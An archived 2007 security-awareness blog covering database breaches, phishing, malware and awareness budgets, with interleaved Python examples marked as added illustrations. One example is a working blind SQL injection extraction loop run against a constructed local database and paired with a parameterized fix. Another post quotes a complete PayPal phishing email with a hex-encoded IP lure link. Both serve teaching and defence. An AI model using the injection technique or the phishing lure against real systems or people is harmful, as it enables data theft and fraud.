Welcome to NBlog, the NoticeBored blog

Feb 26, 2007

Google Hacking for Penetration Testers by Johnny Long is a terrifying book if you are a slightly paranoid information security professional at a major corporation. You'll soon be avidly turning the pages with a growing look of shock and fear on your face, gripped by the unfolding horror story. Google Hacking puts the spotlight firmly on those dark places that many security managers fear to tread: firewall, IDS and IPS configurations, security patching practices, web application security ... need I say more?

If you know someone who thinks antivirus software makes them immune to malware, perhaps our latest awareness module will help you change their mind. There is more to malware than viruses, and antivirus software only partially addresses one class of malware threats.

Since we last put out this core module a year ago, spyware, rootkits and Trojans have become increasingly prominent and problematic while viruses and worms are fading gradually into the background cosmic noise of the Internet (of course, that could be 'famous last words'! There is still no shortage of widespread security vulnerabilities and zero-day exploits to worry about).

George Spafford wrote "there are a number of behaviors that can dramatically increase the odds of human error yet organizations fail to manage them". He identifies a wide range of factors that make human errors more likely including: complexity; deadlines; fatigue; multitasking; poor planning; insufficient testing; lack of change management ... and many more (just read George's paper and I'm sure you will think of more).

George continues, "some organizations may have multiple behaviors that when combined further increase risk levels. Organizations must take a careful look at their culture and processes to understand and subsequently manage the level of human error being introduced." 'Taking a look at' culture and processes is easy enough but changing them (especially the culture) is a different matter entirely. That said, George's list of issues implies a whole load of options for those willing to take up the challenge.

Until March 5th, EDPACS has given free access to 10 years' worth of information security articles. EDPACS is the world's longest running IT audit newsletter - this is its 35th year! It has ~24 pages each month on audit, governance, control and security topics. I agree with Mich Kabay's assessment of the EDPACS archive as a treasure trove. The new EDPACS editor, Dan Swanson, is on the lookout for good articles on emerging issues and practical solutions: send any article proposals to dswanson_2005@yahoo.com

Feb 24, 2007

It's been a full-on blogging day. Here's a little security awareness nugget for all you hungry SQL programmers Out There:

sqlmap is an automatic blind SQL injection tool, developed in Python, capable of performing active database fingerprinting, enumerating entire remote databases and much more. The aim of this project is to implement a fully functional database mapper tool which takes advantage of web application programming security flaws that lead to SQL injection vulnerabilities.
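As an added illustration (not part of the original post, and not sqlmap's own code), here is the boolean-based blind technique such tools automate, written out by hand against a constructed SQLite database. A lookup that splices user input into its query answers only yes or no, yet that single bit per probe is enough to read another column one character at a time. The parameterized version of the same lookup, shown alongside, gives the extraction loop nothing to work with. The table and column names, the sample users and their secrets are all assumptions for the demonstration.

```python
import sqlite3
import string


def build_db():
    """Constructed sample database (not from the original post): two users, one secret each."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users (name, secret) VALUES (?, ?)",
        [("alice", "s3cr3t"), ("bob", "hunter2")],
    )
    return conn


def user_exists_vulnerable(conn, name):
    """Vulnerable lookup: the caller's string is spliced into the SQL text.
    It only ever answers yes/no, which is exactly the 'blind' situation."""
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_safe(conn, name):
    """Hardened lookup: the value is bound as a parameter and never parsed as SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def blind_extract_secret(oracle, target_user, max_len=32):
    """Boolean-based blind extraction against a yes/no oracle.

    Each probe asks 'is character <pos> of the target's secret equal to <ch>?'.
    A true answer leaks one character; no true answer at a position means the
    string has ended. This is the loop a tool like sqlmap automates.
    """
    alphabet = string.ascii_letters + string.digits  # quote-free candidates
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            # Closes the quoted literal and appends a condition on another column.
            # The application's own trailing quote closes the '{ch}' literal.
            payload = (
                f"{target_user}' AND substr("
                f"(SELECT secret FROM users WHERE name='{target_user}'),{pos},1)='{ch}"
            )
            if oracle(payload):
                hit = ch
                break
        if hit is None:
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    conn = build_db()
    leak = blind_extract_secret(lambda n: user_exists_vulnerable(conn, n), "alice")
    print("vulnerable query leaked:", repr(leak))
    safe = blind_extract_secret(lambda n: user_exists_safe(conn, n), "alice")
    print("parameterized query leaked:", repr(safe))
```

Each probe costs one request, so a six-character secret over a 62-symbol alphabet takes at most a few hundred yes/no answers; real tools shorten this further with binary search on character codes. The fix is not filtering quotes but keeping data out of the SQL text entirely, as the parameterized function does.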

A new research study shows that the US Government is spending just 2½% of its impressive $5.6 billion annual IT security budget on security awareness and training. With 6-10 million employees, that's roughly $14 to $23 per person per year, on average. The study's authors expect the spending to remain flat through 2012, although they acknowledge that security incidents tend to spur further investment.

Hello Mr Bush! Helloooo! NIST, your very own internationally-respected standards body, advises that information security awareness, training and education helps avoid or minimize security incidents. Are you asleep at the wheel or just gently dozing?

A federal jury in San Diego has ordered Microsoft to pay $1.5 billion to Alcatel-Lucent in a patent dispute over MP3 audio technology used in Windows. In its verdict, the jury assessed damages based on each Windows PC sold since May 2003. The case could have broader implications, should Alcatel-Lucent pursue claims against other companies that use the widespread MP3 technology. An Alcatel-Lucent representative praised the ruling.

"Praised the ruling" hardly seems to do it justice. It's not every day your company makes $1.5bn from its IPR!

The jury decision is certainly not the end of the matter. The article in cNet News points out parallel patent disputes involving Lucent and Microsoft. With such huge sums at stake, the IP lawyers are having a field day.

It seems we have a lot in common with Luis Navarro of Symantec in relation to security awareness. Writing in SC Magazine, Luis lays out the key parameters and objectives for security awareness programs including:
- Justifying it to senior management via a business case;
- Planning (and hopefully delivering) the program in conjunction with various functions within the organization;
- Making the program delivery 'continuous' not 'one-time' or 'discrete';
- Addressing everyone from top to bottom of the organization, including 'management';
- Measuring awareness and (implicitly) using the results to improve the program;
- Assessing the security environment to identify aspects needing more awareness;
- Promoting awareness of policies and responsibilities (since "investing time and money into securing the organization and its customers can be completely undermined if employees don’t understand their role in the security plan.");
- Delivering the program effectively, sensitive to the audience's needs.

For such a short article, Luis has done a good job of summarizing a sound approach to information security awareness. The only significant element I can see missing is the need for security awareness, training and education for IT professionals: if we expect our IT gurus to build, manage and maintain secure IT systems and networks for the organization, surely we need to make sure they have a good understanding of the objectives and practices of information security? Information security is extremely important to many more IT pros than those working in the Information Security Management Team, yet few organizations seem to appreciate this. Perhaps they just assume that IT pros have already been trained in infosec, and that they are well motivated to make their systems secure? Sadly, in my experience, this is simply not true, meaning that this is a common corporate blind-spot.

Feb 23, 2007

The former head of Moscow City Bank which collapsed in 1994 has been jailed for masterminding a massive identity theft scheme involving fraud, aliases, conspiracy and theft. The fact that fellow Russian conspirators were also convicted points towards organized crime - way above the level of petty theft by lone hi-tech criminals.

A database hacking incident at TJX has evidently exposed bank card and drivers’ license details of millions of customers at its American, Canadian and Puerto Rican TK Maxx and other stores. The systems appear to have been hacked as far back as July 2005, some 18 months before the incident was discovered. [Generally speaking, credit card database hackers often kill the goose that lays the golden eggs by exploiting so many cards that they are traced back to the hacked originator in much less than 18 months. Perhaps the TJX hackers only recently obtained sufficient information to exploit, or perhaps they are true hackers not crackers, in other words they were driven by curiosity not malice and greed. This story is still unfolding.]

A glitch in Flickr's database processing resulted in the occasional presentation of random pictures from the cache rather than the ones requested. No doubt some of the pictures were quite a surprise to customers expecting to see their holiday snaps. A red-faced explanation and apology is a shining example of the value of coming clean after an incident, although personally I would have liked more information about the technical issues.

Feb 20, 2007

A comment in the latest CISO Handbook newsletter about the RSA conference caught my eye this morning:

The third factor, and maybe the most important, is that most security professionals are fixated on solving security issues solely with technology. The number of vendors at RSA that were addressing physical elements of security was scarce, and anyone addressing the sociological elements of security was nowhere to be found (except one that does not count because they solve the problem with an appliance). Technology cannot solve every security issue; all it does is create an imbalance in a company’s security program that leads to a false sense of security (pardon the pun).

RSA is, almost by definition, a technical forum but at the risk of becoming boring, I'll say yet again that information security cannot be 'solved' by technology alone. As long as people are part of the problem, they will inevitably be part of the solution. Security awareness, training and education, coupled with readable policies, usable procedures and helpful guidelines, are essential parts of the information security jigsaw puzzle. So too are management understanding and support ('walking the talk') and a thoroughness of approach by the infosec professionals. Those who are defending the castle must remember that the advancing hordes need only find and exploit one chink in each layer of our defenses.

Perhaps we should repackage and gloss-up our own security awareness services as a 'technology solution'? "Click here to download security awareness 2.0, the all new information security control system."? I guess not.

Feb 8, 2007

Scuba by Imperva is a free, lightweight Java utility that scans Oracle, DB2, MS-SQL, and Sybase databases for known vulnerabilities and configuration flaws. Based on its assessment results, Scuba creates clear, informative reports with detailed test descriptions. Summary reports, available in Java and HTML format, illustrate overall risk level. With Scuba by Imperva, you are quickly on your way to meeting industry-leading best practices for database configuration and management.

The phishers are constantly searching for new wrinkles to fool their victims. Here's a new one on me: as well as the usual request to 'click the link below' to 'verify your identity', victims are invited to cut-and-paste the URL into their browsers, playing on the well-meaning security advice to that effect.

Dear PayPal Account Holder,

We recently noticed one or more attempts to log in to your PayPal Online account from a foreign IP address and we have reasons to belive that your account was hijacked by a third party without your authorization.

If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you. However, if you are the rightfull holder of the account, click on the link below, fill the form and then submit as we try to verify your identity.

Message ID Nr: 0xD2.0xBC.0xDA37

Please click here to verify your PayPal account.

or copy and paste 0xd2.0xbc.0xda.0x37/signin.paypal.com/0xd7/ into your Internet Browser.

Be aware that until we can verify your identity no further access to your account will be allowed and we will have no other liability for your account or any transactions that may have occurred as a result of your failure to upgrade your account as instructed above.
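The 'copy and paste' URL above is the real tell: its host is an IPv4 address written as hexadecimal octets, and 'signin.paypal.com' is merely a directory in the path. Browsers also accept octal, plain decimal and single-number (dword) forms of an address, so a filter that only looks for dotted decimals misses them. The following is an added example, not part of the original post: a small Python normaliser that decodes any of these notations and reports where the expected domain actually appears. Fed the two numeric strings in the message, the link host and the 'Message ID', both decode to the same dotted-decimal address. The expected-domain parameter and the result keys are assumptions of this example.

```python
import ipaddress
from urllib.parse import urlsplit


def _parse_octet(part):
    """Parse one dotted label the way legacy inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16) if len(part) > 2 else 0
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def decode_numeric_host(host):
    """Return the canonical dotted-decimal form if `host` is a numeric IPv4 in any
    legacy notation (1 to 4 parts; the last part may carry the remaining bytes),
    otherwise None for an ordinary domain name."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_octet(p) for p in parts]
    except ValueError:
        return None  # a non-numeric label: this is a domain name, not an address
    *head, last = values
    if any(not 0 <= v <= 255 for v in head):
        return None
    if not 0 <= last < 256 ** (5 - len(values)):
        return None
    dword = 0
    for v in head:
        dword = dword * 256 + v
    dword = dword * 256 ** (4 - len(head)) + last
    return str(ipaddress.IPv4Address(dword))


def analyze_link(link, expected_domain):
    """Classify a pasted link: what host the browser will really contact, and whether
    the brand's domain is the host or merely appears later in the path."""
    url = link if "://" in link else "http://" + link  # browsers assume http://
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    domain = expected_domain.lower()
    in_host = host == domain or host.endswith("." + domain)
    return {
        "host": host,
        "numeric_ip": decode_numeric_host(host),
        "domain_in_host": in_host,
        "domain_in_path_only": (not in_host) and domain in parts.path.lower(),
    }


if __name__ == "__main__":
    # Both strings below are copied from the phishing message quoted above.
    print(decode_numeric_host("0xd2.0xbc.0xda.0x37"))
    print(decode_numeric_host("0xD2.0xBC.0xDA37"))
    print(analyze_link("0xd2.0xbc.0xda.0x37/signin.paypal.com/0xd7/", "paypal.com"))
```

A mail filter or awareness exercise can use `domain_in_path_only` directly: a brand name that appears only after the first slash is exactly the pattern this phish relies on, and normalising the host first stops trivial re-encodings of the same address from slipping past a blocklist.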

An unusual article in CSO Magazine concerns the theft of copper wires (and sometimes fiber optics!) due to a peak in the global price of copper. Thieves are literally risking their lives to steal power cables.

Feb 7, 2007

A database application error (presumably) led to a customer of HBOS (Halifax Bank of Scotland) being sent 75,000 statements for other customers when she requested hers.

Ms McLaughlan, of Netherkirkgate, Aberdeen, said: "I sent away for my bank statements to get a refund on some bank charges. A couple of days later these five packages turned up at my door and they were filled with people's names, credit numbers, what they had paid in, and had taken out every day. The details started from April 2003 and there was also the total of the bank's overdraft."

This is exactly the kind of gross error that output validation is meant to detect and stop. Whilst it is vaguely conceivable that someone may legitimately request such a huge number of statements, the chances are remote enough to make this an exceptional request that can be flagged and held pending human intervention. Of course, it is also quite possible that the HBOS systems did indeed flag this one and someone mistakenly released the output. Doh!
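An added example of the control just described, not from the original post or from HBOS: a fail-closed check run on a batch of statements after the database query and before anything is printed or mailed. Every row must belong to the requesting account, and the batch size must be plausible; anything else is parked for a human rather than released. The Statement record, the 120-statement threshold and the held/sent statuses are assumptions for the demonstration, as is the sample data.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Statement:
    """One statement line as it comes back from the database (assumed shape)."""
    account_id: str
    period: str            # e.g. "2003-04"
    closing_balance: float


class HoldForReview(Exception):
    """Raised when the output fails validation: the job is parked, nothing is released."""


# Assumed plausibility limit: ten years of monthly statements for one account.
MAX_STATEMENTS_PER_REQUEST = 120


def validate_statement_output(requested_account, rows, max_rows=MAX_STATEMENTS_PER_REQUEST):
    """Fail-closed output validation.

    Returns the rows only if every one belongs to the account that asked for them
    and the volume is plausible. Otherwise raises HoldForReview with the reason,
    so the batch goes to a person instead of the post room.
    """
    foreign = sorted({r.account_id for r in rows if r.account_id != requested_account})
    if foreign:
        raise HoldForReview(
            f"output for {requested_account} contains {len(foreign)} other account(s), "
            f"e.g. {foreign[0]}"
        )
    if len(rows) > max_rows:
        raise HoldForReview(
            f"{len(rows)} statements for one request exceeds limit of {max_rows}"
        )
    return list(rows)


def dispatch_statements(requested_account, rows):
    """Decide what happens to a batch: ('sent', row count) or ('held', reason)."""
    try:
        checked = validate_statement_output(requested_account, rows)
    except HoldForReview as why:
        return "held", str(why)
    return "sent", len(checked)


def constructed_batches():
    """Constructed sample data (not real customer records).
    The first batch is what the customer asked for; the second mimics a query
    that lost its account filter and returned everyone's statements."""
    mine = [Statement("ACC-1001", f"2006-{m:02d}", 100.0 + m) for m in range(1, 13)]
    everyone = mine + [
        Statement(f"ACC-{1002 + i}", "2006-12", 50.0 * i) for i in range(3000)
    ]
    return mine, everyone


if __name__ == "__main__":
    mine, everyone = constructed_batches()
    print(dispatch_statements("ACC-1001", mine))
    print(dispatch_statements("ACC-1001", everyone))
```

The ownership check comes first because it is the cheaper and more decisive test: a single foreign account in the output is proof of a defect, whereas the volume cap is only a heuristic and should be tuned to the product (a savings account with few transactions may legitimately need far less than 120).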

Here are just two of this week's stories about the theft of IT systems holding unencrypted databases of personal data.

Firstly, the US Department of Veterans Affairs ("the VA") has reported a portable hard drive containing personal data on veterans as lost, presumed stolen. A laptop computer containing the social security numbers of 26.5 million veterans was stolen from a VA official's home last May and another computer containing personal information on up to 38,000 veterans went missing last August. The VA is belatedly installing encryption software on its laptops at least, if not also its portable drives and desktops.

Secondly, a US accountant's stolen PC contains details of 800 clients for whom she had prepared tax returns. The thieves appear to have targeted the PC specifically since they left behind cash and checks.

Feb 2, 2007

We have just released a brand new awareness module on database security for February. The risks and controls associated with database security make for a fascinating security awareness subject.

For IT professionals, the module contains:
- A risk analysis (available in the NoticeBored newsletter)
- A PowerPoint presentation giving an overview of database security technologies
- A white paper describing database security controls in more depth
- A controls matrix categorizing database security controls into preventive, detective and corrective classes on one axis, and confidentiality, integrity and availability on the other
- And a checklist to guide a systematic review of database security controls.

For the general staff audience, the non-technical posters, seminar slides, screensavers, case study, crossword and other awareness materials highlight personal perspectives on database security, for example when database breaches lead to the exposure of personal data.

Finally, we present the governance aspects of database security to management through mind maps, agendas, PowerPoint slides and briefing papers. Managers need to be aware of the legal and regulatory implications of database security failures. The generic business case for database security controls provides a solid background for managers to assess the security aspects of database development project proposals, and the metrics paper suggests a range of ways in which they can keep an eye on their investments in database security.

"More and more government agencies post public records online, making a startling amount of information available. With a little amateur sleuthing, you can peek into the backgrounds of the people you let into your life -- a nanny or housekeeper, an online acquaintance, a potential business partner -- and be reasonably satisfied they're not predators or crooks." The Seattle Times piece It's never been easier to be your own detective goes on to explain how easy it is to conduct background checks online, whether using do-it-yourself web search techniques or paying a few dollars for others to check on your behalf. While most database records are legitimately placed in the public domain in this fashion, it is equally possible that supposedly private databases could be hacked and end up on underground websites somewhere. The article also makes the point that you cannot necessarily trust everything you read online. Quite apart from the possibility of finding information about someone else with similar details to the person you are checking, the information available online is only as good as that stored in the database.

NBlogger is ...

Dr Gary Hinson PhD MBA CISSP has an abiding interest in human factors - the ‘people side’ as opposed to the purely technical aspects of information security. Gary's career stretches back to the mid-1980s as both practitioner and manager in the fields of IT system and network administration, information security and IT auditing. He has worked and consulted in the pharmaceuticals/life sciences, utilities, IT, engineering, defense, financial services and government sectors, for organizations of all sizes. Since 2003, he has been creating security awareness materials for clients (www.NoticeBored.com) and supporting users of the ISO27k standards (www.ISO27001security.com). In conjunction with Krag Brotby, he wrote "PRAGMATIC security metrics" (www.SecurityMetametrics.com). He is a keen radio amateur, often calling but seldom heard by distant stations on the HF bands.